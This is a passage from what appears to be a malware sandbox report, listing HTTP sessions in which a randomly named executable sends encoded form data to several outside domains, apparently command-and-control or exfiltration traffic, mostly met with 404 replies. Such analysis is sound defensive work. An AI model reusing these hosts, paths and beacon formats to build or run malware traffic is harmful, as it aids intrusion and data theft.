                                                                                                                              Data Raw: 6b 54 39 70 3d 31 74 61 42 63 71 32 4f 31 7a 37 55 4b 37 61 36 65 4a 44 54 41 32 65 38 79 65 44 6d 67 30 41 69 61 70 46 68 63 65 4f 54 72 4b 38 75 6d 37 51 4c 51 59 34 74 79 76 72 34 7a 4b 4d 57 78 6e 6d 52 79 2f 5a 2f 57 65 67 56 63 6e 58 63 63 71 61 34 56 78 36 79 54 2b 2f 52 76 75 50 37 67 4c 74 78 4e 77 4e 36 70 38 6d 4e 6b 6c 6e 59 4d 68 41 72 71 64 67 49 36 64 76 4d 6f 35 6c 49 53 58 63 54 78 6b 30 68 48 64 74 37 56 69 6c 66 63 43 4b 65 78 31 4b 32 47 49 72 65 78 6a 77 59 45 74 30 49 66 65 6e 62 78 47 73 62 36 32 64 6d 66 7a 6f 50 71 33 65 4f 39 2b 79 4e 36 58 44 50 69 65 31 2b 64 6e 68 47 62 53 6b 49 44 6a 35 6d 31 38 36 63 53 45 50 37 6b 54 67 2f 6d 57 62 4b 4c 53 41 5a 56 77 43 51 7a 47 73 45 31 41 66 69 31 64 4b 2b 44 39 4a 57 53 38 4e 43 5a 69 4e 6c 4b 35 64 47 58 6e 79 66 4e 34 74 4d 6b 35 41 4a 71 53 38 39 44 50 50 62 67 66 39 6b 4e 78 5a 75 72 67 43 6e 55 42 50 35 6c 50 68 4b 36 59 39 58 72 6f 61 7a 4c 48 6d 4e 59 6e 30 72 73 31 5a 47 77 72 37 71 62 4f 56 43 48 65 63 6a 61 38 6f 51 44 [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=1taBcq2O1z7UK7a6eJDTA2e8yeDmg0AiapFhceOTrK8um7QLQY4tyvr4zKMWxnmRy/Z/WegVcnXccqa4Vx6yT+/RvuP7gLtxNwN6p8mNklnYMhArqdgI6dvMo5lISXcTxk0hHdt7VilfcCKex1K2GIrexjwYEt0IfenbxGsb62dmfzoPq3eO9+yN6XDPie1+dnhGbSkIDj5m186cSEP7kTg/mWbKLSAZVwCQzGsE1Afi1dK+D9JWS8NCZiNlK5dGXnyfN4tMk5AJqS89DPPbgf9kNxZurgCnUBP5lPhK6Y9XroazLHmNYn0rs1ZGwr7qbOVCHecja8oQDrYunr2qpLxxEL26F54mqxodngx/W5qTzATqQPlwe9I+L7pzbZjjLX9n32v4L2z7o2M29VaXv2A+oH1/1TBl2cCgAI3PJHNrM/1OmZ1x9szRrFtrUSyzx6VPRd/5oWIq5UlPTx9wqWrOlD5YoQsdnSFdaQr7Rg7r+wuSputk1EeF+bKvicrsA40vYGLs8Vl8NRhmRPIiJxmGBM06gEijIDhX7amJ7/gGsX37DMde7c9iTw7Cz12ffiNS1vhUB6WgvkS5ff1Fn6oaozRaE3wa6HjZRnQfVokfSn2DAHGOlJpbqqzEQamvjfzHCGD+Ol0jNHXhKt7oievqpKy+h9o+JJ1vsIK5PZzelIKLhjzJDRixL/WMHcS4s+P5QLoqow8lrBbjI8d+M3V0JJnFIzT1u3065ANfINIEL13zb9dj2bmHWVcRr+NQ5l+tU1QsjtOtBQmIVqj0Yy9UD++YnuLtDIPXcNQxJdaW9Hllyar/rIdnCBPI/hg2uFlPogDSJ5zq21Ex4JvihoEuPFlSYaZhUfAx46WfAXXCy08ECK/FUjFrXGe5X0hxesQdqvNBT1WDkQI26MUTR0W1RiHiPJAKhVtHt26aA/QScnmeQKGEHp2igyQtMAmvgjhwiiBc+OD6mpQ3u4HbG4yNk2uSXI5X8Fsc/uKTpGrLKZ+ [TRUNCATED]
                                                                                                                              Oct 22, 2024 05:39:33.014045000 CEST367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:32 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.649984195.110.124.133805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:34.726413965 CEST409OUTGET /qhr1/?kT9p=4vyhfeGJy1HoJfLgdJHMJiiF5ffL7B9jTKxpb/iJoZFHl/RjV/1B5t3r6p0bkAeKssIvV+AadX2UVbSNYhzuXtrdtufHlrgwCycB7eSZz2zZKA9MpZFsx/+zuOBsemQBs3csDLA=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.hentaistgma.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:39:35.570965052 CEST367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:35 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.64998554.67.87.110805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:41.082259893 CEST641OUTPOST /ntib/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.ngmr.xyz
                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.ngmr.xyz/ntib/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 33 69 70 49 49 4d 44 31 34 67 61 50 6e 57 58 51 64 68 72 35 51 59 7a 2f 2b 41 2f 71 58 72 47 33 70 2b 43 55 63 58 32 79 71 6c 63 68 61 42 4a 66 6a 79 31 6b 72 72 6c 74 7a 6d 36 69 42 76 6a 30 32 6b 65 42 51 6e 39 33 36 4a 4c 78 42 61 4d 51 6b 58 71 71 58 69 37 2f 70 36 76 53 54 30 63 66 51 72 6d 59 6c 32 75 6d 6d 67 59 6d 55 65 33 50 4f 59 79 54 42 31 45 64 4a 4c 4f 47 45 33 79 7a 48 6a 30 57 58 34 7a 45 49 75 50 63 70 56 61 6d 4a 77 7a 61 4a 71 4b 62 32 38 36 78 2f 4a 6c 43 66 6a 72 57 4d 2b 58 71 6f 33 2b 44 6b 44 57 63 55 4a 54 61 55 6a 4e 63 68 34 42 45 53 55 7a 63 73 59 76 43 6b 65 37 45 33 58 73 71
                                                                                                                              Data Ascii: kT9p=3ipIIMD14gaPnWXQdhr5QYz/+A/qXrG3p+CUcX2yqlchaBJfjy1krrltzm6iBvj02keBQn936JLxBaMQkXqqXi7/p6vST0cfQrmYl2ummgYmUe3POYyTB1EdJLOGE3yzHj0WX4zEIuPcpVamJwzaJqKb286x/JlCfjrWM+Xqo3+DkDWcUJTaUjNch4BESUzcsYvCke7E3Xsq
                                                                                                                              Oct 22, 2024 05:39:41.757124901 CEST550INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Content-Length: 282
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 22 Oct 2024 04:03:12 GMT
                                                                                                                              X-Varnish: 1435552209
                                                                                                                              Age: 0
                                                                                                                              Via: 1.1 varnish
                                                                                                                              Connection: close
                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                              Server: C2M Server v1.02
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.64998654.67.87.110805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:43.633754969 CEST665OUTPOST /ntib/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.ngmr.xyz
                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.ngmr.xyz/ntib/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 33 69 70 49 49 4d 44 31 34 67 61 50 6f 56 66 51 4f 43 54 35 42 6f 7a 2b 78 67 2f 71 4f 37 47 37 70 2b 4f 55 63 53 57 69 71 58 34 68 44 68 5a 66 6b 77 64 6b 6d 4c 6c 74 37 47 36 6e 4d 50 6a 7a 32 6b 43 2f 51 69 56 33 36 4a 50 78 42 62 38 51 6b 67 32 72 58 79 37 71 68 61 76 51 64 55 63 66 51 72 6d 59 6c 32 53 63 6d 6b 4d 6d 54 76 48 50 4f 35 79 51 66 46 45 61 5a 62 4f 47 41 33 79 33 48 6a 31 44 58 36 58 2b 49 74 33 63 70 58 79 6d 4a 6c 48 5a 63 36 4b 6e 36 73 37 59 73 4a 6f 30 66 41 4c 53 4e 4f 47 53 30 6c 57 43 6c 31 58 47 49 36 54 35 47 7a 74 65 68 36 5a 32 53 30 7a 32 75 59 58 43 32 4a 33 6a 34 6a 4a 4a 74 61 43 61 32 32 2f 34 4e 46 44 2b 6c 51 44 75 6b 38 50 71 75 77 3d 3d
                                                                                                                              Data Ascii: kT9p=3ipIIMD14gaPoVfQOCT5Boz+xg/qO7G7p+OUcSWiqX4hDhZfkwdkmLlt7G6nMPjz2kC/QiV36JPxBb8Qkg2rXy7qhavQdUcfQrmYl2ScmkMmTvHPO5yQfFEaZbOGA3y3Hj1DX6X+It3cpXymJlHZc6Kn6s7YsJo0fALSNOGS0lWCl1XGI6T5Gzteh6Z2S0z2uYXC2J3j4jJJtaCa22/4NFD+lQDuk8Pquw==
                                                                                                                              Oct 22, 2024 05:39:44.289541960 CEST550INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Content-Length: 282
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 22 Oct 2024 04:03:14 GMT
                                                                                                                              X-Varnish: 1435552220
                                                                                                                              Age: 0
                                                                                                                              Via: 1.1 varnish
                                                                                                                              Connection: close
                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                              Server: C2M Server v1.02
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.64998754.67.87.110805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:46.182544947 CEST1678OUTPOST /ntib/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.ngmr.xyz
                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.ngmr.xyz/ntib/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 33 69 70 49 49 4d 44 31 34 67 61 50 6f 56 66 51 4f 43 54 35 42 6f 7a 2b 78 67 2f 71 4f 37 47 37 70 2b 4f 55 63 53 57 69 71 58 77 68 66 43 68 66 6b 58 70 6b 70 72 6c 74 78 6d 36 6d 4d 50 6a 75 32 6b 61 6a 51 69 52 4a 36 4c 6e 78 41 39 6f 51 67 68 32 72 43 43 37 71 6a 61 76 54 54 30 64 48 51 72 33 66 6c 33 75 63 6d 6b 4d 6d 54 74 66 50 61 34 79 51 64 46 45 64 4a 4c 4f 61 45 33 79 66 48 6e 67 30 58 36 44 75 49 63 58 63 71 33 69 6d 50 54 72 5a 64 61 4b 6c 37 63 37 41 73 4a 6b 6e 66 41 57 70 4e 4f 7a 61 30 6c 69 43 6c 79 54 61 58 36 61 75 59 41 74 76 32 36 56 47 62 30 72 31 6b 5a 44 78 6e 61 37 68 35 43 70 57 6c 76 75 32 31 56 65 65 4d 6d 50 46 35 57 4b 43 70 73 2b 6a 35 38 51 6e 58 62 53 46 34 70 65 48 62 44 44 50 53 7a 6b 42 2f 33 6e 68 62 45 53 72 50 34 5a 6c 2f 69 78 65 33 42 79 4b 34 63 78 56 6e 68 71 36 4a 76 75 2b 42 2f 48 38 33 2b 58 4f 6b 37 77 54 72 4d 46 64 53 33 2f 6f 45 45 61 62 44 4a 62 41 55 73 2f 54 58 51 52 4d 49 4e 62 76 41 39 6b 6b 53 63 30 41 36 76 54 34 69 6c 72 62 6a [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=3ipIIMD14gaPoVfQOCT5Boz+xg/qO7G7p+OUcSWiqXwhfChfkXpkprltxm6mMPju2kajQiRJ6LnxA9oQgh2rCC7qjavTT0dHQr3fl3ucmkMmTtfPa4yQdFEdJLOaE3yfHng0X6DuIcXcq3imPTrZdaKl7c7AsJknfAWpNOza0liClyTaX6auYAtv26VGb0r1kZDxna7h5CpWlvu21VeeMmPF5WKCps+j58QnXbSF4peHbDDPSzkB/3nhbESrP4Zl/ixe3ByK4cxVnhq6Jvu+B/H83+XOk7wTrMFdS3/oEEabDJbAUs/TXQRMINbvA9kkSc0A6vT4ilrbjunQ0H9jWfoD2aTtfv96ixIqOhBZmciOPrhsOVWChfuzFML67WG4mWfIJDJV3vNh8vU5vfuykQs3cStKOmODCozfi/JLCT+OKqkB6A5hX/4UVO47sYDwziuE4l2MMSnRAyAZ2MIH4kyrHm7xIw5qISYZsI8pXYPiaV13KR3+szuFmwI/QzmNSRLCDNFURjamgMiu5HYpWno7WuOzxZKYHsjN7CGC5VDpRXn+RvqqCYVlqe8Z+8xataADuNJB9FI4iLu2E77o4vznlSgRQiU2aSEam8zeYeDOZh771Us7pFz9CfQUDAH4wJ2N5OFyCxyhwysYyqc5QxK3YiD6yog1CRXkFFQrMfihijiRi62FAR6Hkq454xtpLxQc1pP8Lf8dEgjnLZuGhlzA8Mvs7a4o4LYGicNaHftpdSVzUySq3bu8pGY4LmNm2czrxHVcQIiERjzmioX+bE73YAPfq3Fz7ssdkkeiv3br7yrKLjLn2zrOBpMniSVOUh/kWVZBHyq5SOwV4s9rGNTkGMIsEM75pA2gH+soVTq/hWVBQrlvECRNseUsPv5Th1veg+fUZou1CGqv7MuaEw36wpXtTkbhYaTdMkRVFTT3h+CT/gLWOuN+24cMWOFor8bPwtHHlSAD1yzippvsdnnChX8PoOV1s/mBtrDsdrIb9PT [TRUNCATED]
                                                                                                                              Oct 22, 2024 05:39:46.844705105 CEST550INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Content-Length: 282
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 22 Oct 2024 04:03:17 GMT
                                                                                                                              X-Varnish: 1435552224
                                                                                                                              Age: 0
                                                                                                                              Via: 1.1 varnish
                                                                                                                              Connection: close
                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                              Server: C2M Server v1.02
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.64998854.67.87.110805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:48.735362053 CEST402OUTGET /ntib/?in1Hf=rx3dZnMxlRvDbR&kT9p=6gBoL4716wSvqjL5PCL9Otm46h/RO+qAgNOYViOcikg4H3EcrAY/v4xx2gixZebSxES1QV9P/IXhCYI/sCqyeCK3gvy3e15BfbqdhxqVigAySd7dFKOwRmIIBq2hI0q3F0AcNNQ= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.ngmr.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:39:49.394701004 CEST550INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Content-Length: 282
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 22 Oct 2024 04:03:19 GMT
                                                                                                                              X-Varnish: 1435552229
                                                                                                                              Age: 0
                                                                                                                              Via: 1.1 varnish
                                                                                                                              Connection: close
                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                              Server: C2M Server v1.02
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.649989199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:59.546803951 CEST665OUTPOST /rul7/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.polarmuseum.info
                                                                                                                              Origin: http://www.polarmuseum.info
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.polarmuseum.info/rul7/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 46 75 4f 30 41 7a 52 43 75 2b 61 79 66 33 64 58 4a 6b 63 69 70 58 48 32 63 49 41 69 48 53 6d 78 32 43 32 56 52 48 52 33 4f 44 74 6e 56 34 36 35 6e 33 65 45 57 35 50 37 49 47 64 79 52 6c 6f 2b 67 59 6e 59 38 48 6e 48 4a 52 2f 59 41 4a 4a 31 79 48 45 71 34 70 73 77 59 2f 58 30 49 4d 4f 31 39 58 42 4c 73 57 76 2f 6d 50 4d 72 6d 56 2b 6c 30 56 71 7a 77 50 37 64 6f 77 2f 51 63 30 55 72 2b 54 4a 59 62 72 45 36 54 4b 5a 33 6f 70 55 4f 6e 54 69 49 72 76 43 6f 43 37 36 56 6b 64 43 32 6b 47 35 53 4d 6f 72 41 43 6d 62 33 35 39 4a 42 49 39 61 47 30 6b 6d 31 4c 73 66 52 33 4f 74 79 76 59 4e 76 56 44 75 67 64 4d 58 75
                                                                                                                              Data Ascii: kT9p=FuO0AzRCu+ayf3dXJkcipXH2cIAiHSmx2C2VRHR3ODtnV465n3eEW5P7IGdyRlo+gYnY8HnHJR/YAJJ1yHEq4pswY/X0IMO19XBLsWv/mPMrmV+l0VqzwP7dow/Qc0Ur+TJYbrE6TKZ3opUOnTiIrvCoC76VkdC2kG5SMorACmb359JBI9aG0km1LsfR3OtyvYNvVDugdMXu
                                                                                                                              Oct 22, 2024 05:40:00.196727991 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:39:59 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1134
                                                                                                                              x-request-id: 00f535aa-9e66-4c9d-894c-b1c9c6de65f3
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
